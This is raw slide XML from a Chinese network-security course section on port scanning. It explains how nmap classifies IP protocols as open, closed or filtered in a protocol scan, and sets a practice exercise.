                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行IP协议的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤十</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="文本框 119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1083945"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>查看目标主机返回的数据包，返回了UDP响应包，协议标号是1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2-2-63</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1729105"/>
            <a:ext cx="5276850" cy="3524250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="文本框 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="5253355"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-63 返回UDP响应包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517525" y="3429000"/>
            <a:ext cx="5080000" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.从扫描结果可以看到目标主机有5个IP协议是开放的，但是其中有2个IP协议收不到响应所以被nmap判断为openlfiltered。协议扫描关注的并不是ICMP的端口不可达到的消息，而是ICMP协议不可达到的消息，nmap只要接到服务器任何协议的响应，就会把接到的响应协议标记为open。如果ICMP不可到达就会将端口判断为closed，其他的ICMP不可到达的协议会标记为filtered，而一直接不到服务器协议的响应就会标记为open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>filtered。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786245" y="6761480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="文本框 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4102735" y="1676400"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>练习利用nmap工具进行端口扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="表格 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4102735" y="2044700"/>
          <a:ext cx="5287963" cy="2921000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1111250"/>
                <a:gridCol w="2609850"/>
                <a:gridCol w="1566863"/>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>项目名称</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
